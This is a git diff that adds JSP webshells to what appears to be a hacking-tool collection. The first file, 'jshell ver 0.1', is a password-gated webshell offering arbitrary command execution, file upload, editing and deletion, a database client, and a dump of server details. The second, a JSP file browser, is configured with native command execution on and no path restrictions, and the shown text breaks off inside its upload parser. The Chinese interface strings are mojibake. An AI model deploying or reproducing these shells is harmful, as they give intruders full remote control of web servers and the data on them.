13) { + i ++; + } + + seperator = new byte[i]; + + for (i = 0; i < seperator.length; i ++) { + seperator[i] = inBytes[i]; + } + + // + // õHeader + // + String dataHeader = null; + i += 3; + start = i; + while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { + i ++; + } + end = i - 1; + dataHeader = new String(inBytes, start, end - start + 1); + + // + // õļ + // + token = "filename=\""; + start = dataHeader.indexOf(token) + token.length(); + token = "\""; + end = dataHeader.indexOf(token, start) - 1; + filePath = dataHeader.substring(start, end + 1); + filePath = pathConvert(filePath); + String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + + // + // õļݿʼλ + // + i += 4; + start = i; + + /* + boolean found = true; + byte[] tmp = new byte[seperator.length]; + while (i <= inBytes.length - 1 - seperator.length) { + + for (int j = i; j < i + seperator.length; j ++) { + if (seperator[j - i] != inBytes[j]) { + found = false; + break; + } else + tmp[j - i] = inBytes[j]; + } + + if (found) + break; + + i ++; + }*/ + + // + // ͵İ취 + // + end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + + // + // Ϊļ + // + File newFile = new File(path + fileName); + newFile.createNewFile(); + FileOutputStream out = new FileOutputStream(newFile); + + //out.write(inBytes, start, end - start + 1); + out.write(inBytes, start, end - start + 1); + out.close(); + + sRet = "\n"; + } catch (IOException e) { + sRet = "\n"; + } + + sRet += ""; + return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} + +public String getFileNameByPath(String path) { + String sRet = ""; + + path = pathConvert(path); + + if (path.lastIndexOf("/") != -1) { + sRet = path.substring(path.lastIndexOf("/") + 1); + } else { + sRet = path; + } + + return sRet; +} + +public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { + String sRet = ""; + int i; + + path = pathConvert(path); + dstPath = pathConvert(dstPath); + + for (i = 0; i < files2Copy.length; i ++) { + if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { + sRet += "ļ\"" + files2Copy[i] + "\"ʧ
    "; + } + } + + if (sRet.equals("")) { + sRet = "ļƳɹڷأԺ򡭡"; + sRet += ""; + } + + return sRet; +} + +public boolean isFileName(String fileName) { + boolean bRet = false; + + Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); + Matcher m = p.matcher(fileName); + + bRet = m.matches(); + + return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { + String sRet = ""; + + path = pathConvert(path); + file2Rename = pathConvert(file2Rename); + + try { + File file = new File(file2Rename); + + newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; + File newFile = new File(newName); + + if (! file.exists()) { + sRet = "ļ\"" + file2Rename + "\""; + } else { + file.renameTo(newFile); + sRet = "ļɹڷأԺ򡭡"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "ȫ⵼ļ\"" + file2Rename + "\"ʧ"; + } + + return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { + boolean bRet = true; + String driverName = ""; + + if (dbServer.equals("")) + dbServer = "localhost"; + + try { + if (dbType.equals("sqlserver")) { + driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; + if (dbPort.equals("")) + dbPort = "1433"; + _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("mysql")) { + driverName = "com.mysql.jdbc.Driver"; + if (dbPort.equals("")) + dbPort = "3306"; + _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("odbc")) { + driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; + _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; + } else if (dbType.equals("oracle")) { + driverName = "oracle.jdbc.driver.OracleDriver"; + _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; + } else if (dbType.equals("db2")) { + driverName = "com.ibm.db2.jdbc.app.DB2Driver"; + _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; + } + + Class.forName(driverName); + } catch (ClassNotFoundException e) { + bRet = false; + } + + return bRet; +} + +public boolean DBConnect(String User, String Password) { + boolean bRet = false; + + if (_url != null) { + try { + _dbConnection = DriverManager.getConnection(_url, User, Password); + _dbStatement = _dbConnection.createStatement(); + bRet = true; + } catch (SQLException e) { + bRet = false; + } + } + + return bRet; +} + +public String DBExecute(String sql) { + String sRet = ""; + + if (_dbConnection == null || _dbStatement == null) { + sRet = "ݿû"; + } else { + try { + if (sql.toLowerCase().substring(0, 6).equals("select")) { + ResultSet rs = _dbStatement.executeQuery(sql); + ResultSetMetaData rsmd = rs.getMetaData(); + int colNum = rsmd.getColumnCount(); + int colType; + + sRet = "sqlִгɹؽ
    \n"; + sRet += "\n"; + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + sRet += " \n"; + } + sRet += " \n"; + while (rs.next()) { + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + colType = rsmd.getColumnType(i); + + sRet += " \n"; + } + sRet += " \n"; + } + sRet += "
    " + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
    "; + switch (colType) { + case Types.BIGINT: + sRet += rs.getLong(i); + break; + + case Types.BIT: + sRet += rs.getBoolean(i); + break; + + case Types.BOOLEAN: + sRet += rs.getBoolean(i); + break; + + case Types.CHAR: + sRet += rs.getString(i); + break; + + case Types.DATE: + sRet += rs.getDate(i).toString(); + break; + + case Types.DECIMAL: + sRet += rs.getDouble(i); + break; + + case Types.NUMERIC: + sRet += rs.getDouble(i); + break; + + case Types.REAL: + sRet += rs.getDouble(i); + break; + + case Types.DOUBLE: + sRet += rs.getDouble(i); + break; + + case Types.FLOAT: + sRet += rs.getFloat(i); + break; + + case Types.INTEGER: + sRet += rs.getInt(i); + break; + + case Types.TINYINT: + sRet += rs.getShort(i); + break; + + case Types.VARCHAR: + sRet += rs.getString(i); + break; + + case Types.TIME: + sRet += rs.getTime(i).toString(); + break; + + case Types.DATALINK: + sRet += rs.getTimestamp(i).toString(); + break; + } + sRet += "
    \n"; + + rs.close(); + } else { + if (_dbStatement.execute(sql)) { + sRet = "sqlִгɹ"; + } else { + sRet = "sqlִʧ"; + } + } + } catch (SQLException e) { + sRet = "sqlִʧ"; + } + } + + return sRet; +} + +public void DBRelease() { + try { + if (_dbStatement != null) { + _dbStatement.close(); + _dbStatement = null; + } + + if (_dbConnection != null) { + _dbConnection.close(); + _dbConnection = null; + } + } catch (SQLException e) { + + } +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { + private String _jshellContent = null; + private String _path = null; + + public JshellConfig(String path) throws JshellConfigException { + _path = path; + read(); + } + + private void read() throws JshellConfigException { + try { + FileReader jshell = new FileReader(new File(_path)); + char[] buffer = new char[1024]; + int nChars; + _jshellContent = ""; + + while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { + _jshellContent += new String(buffer, 0, nChars); + } + + jshell.close(); + } catch (IOException e) { + throw new JshellConfigException("ļʧ"); + } + } + + public void save() throws JshellConfigException { + FileWriter jshell = null; + + try { + jshell = new FileWriter(new File(_path)); + char[] buffer = _jshellContent.toCharArray(); + int start = 0; + int size = 1024; + + for (start = 0; start < buffer.length - 1 - size; start += size) { + jshell.write(buffer, start, size); + } + + jshell.write(buffer, start, buffer.length - 1 - start); + } catch (IOException e) { + new JshellConfigException("дļʧ"); + } finally { + try { + jshell.close(); + } catch (IOException e) { + + } + } + } + + public void setPassword(String password) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = p.matcher(password); + + if (! m.matches()) { + throw new JshellConfigException("벻гĸ»ַ"); + } + + p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); + m = p.matcher(_jshellContent); + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + + //return HTMLEncode(_jshellContent); + } + + public void setEncodeType(String encodeType) throws JshellConfigException { + Pattern p = Pattern.compile("[A-Za-z0-9]+"); + Matcher m = p.matcher(encodeType); + + if (! m.matches()) { + throw new JshellConfigException("ʽֻĸֵ"); + } + + p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); + //return HTMLEncode(_jshellContent); + } + + public void setSessionTime(String sessionTime) throws JshellConfigException { + Pattern p = Pattern.compile("\\d+"); + Matcher m = p.matcher(sessionTime); + + if (! m.matches()) { + throw new JshellConfigException("sessionʱʱֻ"); + } + + p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); + //return HTMLEncode(_jshellContent); + } + + public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = null; + int i; + String fileTypes = ""; + String tmpFileTypes = ""; + + for (i = 0; i < textFileTypes.length; i ++) { + m = p.matcher(textFileTypes[i]); + + if (! m.matches()) { + throw new JshellConfigException("չֻĸֺ»ߵ"); + } + + if (i != textFileTypes.length - 1) + fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; + else + fileTypes += "\"" + textFileTypes[i] + "\""; + } + + for (i = 0; i < _textFileTypes.length; i ++) { + if (i != _textFileTypes.length - 1) + tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; + else + tmpFileTypes += "\"" + _textFileTypes[i] + "\""; + } + + p = Pattern.compile(tmpFileTypes); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ļѾǷ޸"); + } + + _jshellContent = m.replaceAll(fileTypes); + + //return HTMLEncode(_jshellContent); + } + + public String getContent() { + return HTMLEncode(_jshellContent); + } +} + +class JshellConfigException extends Exception { + public JshellConfigException(String message) { + super(message); + } +} +%> + + +jshell ver 0.1 + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> + + + + + + + + + + +
    + + +
    +<% +//================================================================================================ +// end of the login form +} else { + String password = null; + + if (session.getAttribute("password") == null) { + password = (String)request.getParameter("password"); + + if (validate(password) == false) { + out.println("
  • !
    • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } + + String action = null; + + if (request.getParameter("action") == null) + action = "main"; + else + action = (String)request.getParameter("action"); + + if (action.equals("exit")) { + session.removeAttribute("password"); + response.sendRedirect(request.getRequestURI()); + out.close(); + return; + } + +// show the main menu +//==================================================================================== +%> + + + + + + + +
    + + +
    +<% +//===================================================================================== +// end of main menu + + if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Ϣ
    <%=request.getServerName()%>
    ˿<%=request.getServerPort()%>
    ϵͳ<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    ǰû<%=System.getProperty("user.name")%>
    ǰûĿ¼<%=System.getProperty("user.home")%>
    ǰûĿ¼<%=System.getProperty("user.dir")%>
    ·<%=request.getRequestURI()%>
    ·<%=request.getRealPath(request.getServletPath())%>
    Э<%=request.getProtocol()%>
    汾Ϣ<%=application.getServerInfo()%>
    JDK汾<%=System.getProperty("java.version")%>
    JDKװ·<%=System.getProperty("java.home")%>
    JAVA汾<%=System.getProperty("java.vm.specification.version")%>
    JAVA<%=System.getProperty("java.vm.name")%>
    JAVA·<%=System.getProperty("java.class.path")%>
    JAVA·<%=System.getProperty("java.library.path")%>
    JAVAʱĿ¼<%=System.getProperty("java.io.tmpdir")%>
    JIT<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    չĿ¼·<%=System.getProperty("java.ext.dirs")%>
    ͻϢ
    ͻַ<%=request.getRemoteAddr()%>
    <%=request.getRemoteHost()%>
    û<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    ʽ<%=request.getScheme()%>
    Ӧðȫ׽ֲ<%=request.isSecure() == true ? "" : ""%>
    +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("filesystem")) { + String curPath = ""; + String result = ""; + String fsAction = ""; + + if (request.getParameter("curPath") == null) { + curPath = request.getRealPath(request.getServletPath()); + curPath = pathConvert((new File(curPath)).getParent()); + } else { + curPath = Unicode2GB((String)request.getParameter("curPath")); + } + + if (request.getParameter("fsAction") == null) { + fsAction = "list"; + } else { + fsAction = (String)request.getParameter("fsAction"); + } + + if (fsAction.equals("list")) + result = listFiles(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("browse")) { + result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); + result += browseFile(curPath); + } + else if (fsAction.equals("open")) + result = openFile(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("save")) { + if (request.getParameter("fileContent") == null) { + result = "ҳ浼"; + } else { + String fileContent = Unicode2GB((String)request.getParameter("fileContent")); + result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("createFolder")) { + if (request.getParameter("folderName") == null) { + result = "Ŀ¼Ϊ"; + } else { + String folderName = Unicode2GB(request.getParameter("folderName").trim()); + if (folderName.equals("")) { + result = "Ŀ¼Ϊ"; + } else { + result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); + } + } + } else if (fsAction.equals("createFile")) { + if (request.getParameter("fileName") == null) { + result = "ļΪ"; + } else { + String fileName = Unicode2GB(request.getParameter("fileName").trim()); + if (fileName.equals("")) { + result = "ļΪ"; + } else { + result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); + } + } + } else if (fsAction.equals("deleteFile")) { + if (request.getParameter("filesDelete") == null) { + result = "ûѡҪɾļ"; + } else { + String[] files2Delete = (String[])request.getParameterValues("filesDelete"); + if (files2Delete.length == 0) { + result = "ûѡҪɾļ"; + } else { + for (int n = 0; n < files2Delete.length; n ++) { + files2Delete[n] = Unicode2GB(files2Delete[n]); + } + result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); + } + } + } else if (fsAction.equals("saveAs")) { + if (request.getParameter("fileContent") == null) { + result = "ҳ浼"; + } else { + String fileContent = Unicode2GB(request.getParameter("fileContent")); + result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("upload")) { + result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); + } else if (fsAction.equals("copyto")) { + if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { + result = "ûѡҪƵļ"; + } else { + String[] files2Copy = request.getParameterValues("filesDelete"); + String dstPath = request.getParameter("dstPath").trim(); + if (files2Copy.length == 0) { + result = "ûѡҪƵļ"; + } else if (dstPath.equals("")) { + result = "ûдҪƵĿ¼·"; + } else { + for (int i = 0; i < files2Copy.length; i ++) + files2Copy[i] = Unicode2GB(files2Copy[i]); + + result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); + } + } + } else if (fsAction.equals("rename")) { + if (request.getParameter("fileRename") == null) { + result = "ҳ浼"; + } else { + String file2Rename = request.getParameter("fileRename").trim(); + String newName = request.getParameter("newName").trim(); + if (file2Rename.equals("")) { + result = "ûѡҪļ"; + } else if (newName.equals("")) { + result = "ûдļ"; + } else { + result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); + } + } + } +%> + + + + + + + + + +
    ַ +
    <%= result.trim().equals("")?" " : result%>
    +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("command")) { + String cmd = ""; + InputStream ins = null; + String result = ""; + + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command"); + result = exeCmd(cmd); + } +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
    ִ
    + + +
    ִн
    + + + + +
    <%=result == "" ? " " : result%>
    +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("database")) { + String dbAction = ""; + String result = ""; + String dbType = ""; + String dbServer = ""; + String dbPort = ""; + String dbUsername = ""; + String dbPassword = ""; + String dbName = ""; + String dbResult = ""; + String sql = ""; + + if (request.getParameter("dbAction") == null) { + dbAction = "main"; + } else { + dbAction = request.getParameter("dbAction").trim(); + if (dbAction.equals("")) + dbAction = "main"; + } + + if (dbAction.equals("main")) { + result = " "; + } else if (dbAction.equals("dbConnect")) { + if (request.getParameter("dbType") == null || + request.getParameter("dbServer") == null || + request.getParameter("dbPort") == null || + request.getParameter("dbUsername") == null || + request.getParameter("dbPassword") == null || + request.getParameter("dbName") == null) { + response.sendRedirect(request.getRequestURI() + "?action=" + action); + } else { + dbType = request.getParameter("dbType").trim(); + dbServer = request.getParameter("dbServer").trim(); + dbPort = request.getParameter("dbPort").trim(); + dbUsername = request.getParameter("dbUsername").trim(); + dbPassword = request.getParameter("dbPassword").trim(); + dbName = request.getParameter("dbName").trim(); + + if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { + if (DBConnect(dbUsername, dbPassword)) { + if (request.getParameter("sql") != null) { + sql = request.getParameter("sql").trim(); + if (! sql.equals("")) { + dbResult = DBExecute(sql); + } + } + + result = "\n"; + result += "sql

     \n"; + + DBRelease(); + } else { + result = "ݿʧ"; + } + } else { + result = "ݿûҵ"; + } + } + } +%> + + + "> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    ݿ + + +
    ݿַ
    ݿ˿
    ݿû
    ݿ
    ݿ
    <%=result%>
    + + + + +
    + <%=dbResult%> +
    +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("config")) { + String cfAction = ""; + int i; + + if (request.getParameter("cfAction") == null) { + cfAction = "main"; + } else { + cfAction = request.getParameter("cfAction").trim(); + if (cfAction.equals("")) + cfAction = "main"; + } + + if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + + " onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
    ϵͳ
    Sessionʱʱ
    ɱ༭ļ + + + + + + +
    + + + +

    + +     		+ +
    +
    +<% + } else if (cfAction.equals("save")) { + if (request.getParameter("password") == null || + request.getParameter("encode") == null || + request.getParameter("sessionTime") == null || + request.getParameterValues("textFileTypes") == null) { + response.sendRedirect(request.getRequestURI()); + } + + String result = ""; + + String newPassword = request.getParameter("password").trim(); + String newEncodeType = request.getParameter("encode").trim(); + String newSessionTime = request.getParameter("sessionTime").trim(); + String[] newTextFileTypes = request.getParameterValues("textFileTypes"); + String jshellPath = request.getRealPath(request.getServletPath()); + + try { + JshellConfig jconfig = new JshellConfig(jshellPath); + jconfig.setPassword(newPassword); + jconfig.setEncodeType(newEncodeType); + jconfig.setSessionTime(newSessionTime); + jconfig.setTextFileTypes(newTextFileTypes); + jconfig.save(); + result += "ñɹڷأԺ򡭡"; + result += ""; + } catch (JshellConfigException e) { + result = "" + e.getMessage() + ""; + } + +%> + + + + +
    <%=result == "" ? " " : result%>
    +<% + } +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form + } else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + + + + +
    jshell ver 0.1
    created by `١کI and welcome to ǻ̳
    +<% +//========================================================================================== + } +} +%> + + + \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/jspbrowser/Browser.jsp b/jsp/hackk8/fuck-jsp/jspbrowser/Browser.jsp new file mode 100644 index 0000000..2bac9d1 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/jspbrowser/Browser.jsp @@ -0,0 +1,1934 @@ +<%-- + jsp File browser 1.2 + Copyright (C) 2003-2006 Boris von Loesch + This program is free software; you can redistribute it and/or modify it under + the terms of the GNU General Public License as published by the + Free Software Foundation; either version 2 of the License, or (at your option) + any later version. + This program is distributed in the hope that it will be useful, but + WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or + FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. + You should have received a copy of the GNU General Public License along with + this program; if not, write to the + Free Software Foundation, Inc., + 59 Temple Place, Suite 330, + Boston, MA 02111-1307 USA + - Description: jsp File browser v1.2 -- This JSP program allows remote web-based + file access and manipulation. You can copy, create, move and delete files. + Text files can be edited and groups of files and folders can be downloaded + as a single zip file that's created on the fly. + - Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts +--%> +<%@page import="java.util.*, + java.net.*, + java.text.*, + java.util.zip.*, + java.io.*" +%> +<%! + //FEATURES + private static final boolean NATIVE_COMMANDS = true; + /** + *If true, all operations (besides upload and native commands) + *which change something on the file system are permitted + */ + private static final boolean READ_ONLY = false; + //If true, uploads are allowed even if READ_ONLY = true + private static final boolean ALLOW_UPLOAD = true; + + //Allow browsing and file manipulation only in certain directories + private static final boolean RESTRICT_BROWSING = false; + //If true, the user is allowed to browse only in RESTRICT_PATH, + //if false, the user is allowed to browse all directories besides RESTRICT_PATH + private static final boolean RESTRICT_WHITELIST = false; + //Paths, sperated by semicolon + //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!! + private static final String RESTRICT_PATH = "/etc;/var"; + + //The refresh time in seconds of the upload monitor window + private static final int UPLOAD_MONITOR_REFRESH = 2; + //The number of colums for the edit field + private static final int EDITFIELD_COLS = 85; + //The number of rows for the edit field + private static final int EDITFIELD_ROWS = 30; + //Open a new window to view a file + private static final boolean USE_POPUP = true; + /** + * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be + * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries. + * This can yield to performance issues. Turn it off, if the directory loads to slow. + */ + private static final boolean USE_DIR_PREVIEW = false; + private static final int DIR_PREVIEW_NUMBER = 10; + /** + * The name of an optional CSS Stylesheet file + */ + private static final String CSS_NAME = "Browser.css"; + /** + * The compression level for zip file creation (0-9) + * 0 = No compression + * 1 = Standard compression (Very fast) + * ... + * 9 = Best compression (Very slow) + */ + private static final int COMPRESSION_LEVEL = 1; + /** + * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the + * server runs on a windows platform, to avoid a message box, if you try to access + * an empty removable drive (See KNOWN BUGS in Readme.txt). + */ + private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; + + /** + * Command of the shell interpreter and the parameter to run a programm + */ + private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows + //private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; // Unix + + /** + * Max time in ms a process is allowed to run, before it will be terminated + */ + private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds + + //Button names + private static final String SAVE_AS_ZIP = "Download selected files as (z)ip"; + private static final String RENAME_FILE = "(R)ename File"; + private static final String DELETE_FILES = "(Del)ete selected files"; + private static final String CREATE_DIR = "Create (D)ir"; + private static final String CREATE_FILE = "(C)reate File"; + private static final String MOVE_FILES = "(M)ove Files"; + private static final String COPY_FILES = "Cop(y) Files"; + private static final String LAUNCH_COMMAND = "(L)aunch external program"; + private static final String UPLOAD_FILES = "Upload"; + + //Normally you should not change anything after this line + //---------------------------------------------------------------------------------- + //Change this to locate the tempfile directory for upload (not longer needed) + private static String tempdir = "."; + private static String VERSION_NR = "1.2"; + private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); + + public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } + } + + public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } + } + + // A Class with methods used to process a ServletInputStream + public class HttpMultiPartParser { + + //private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, 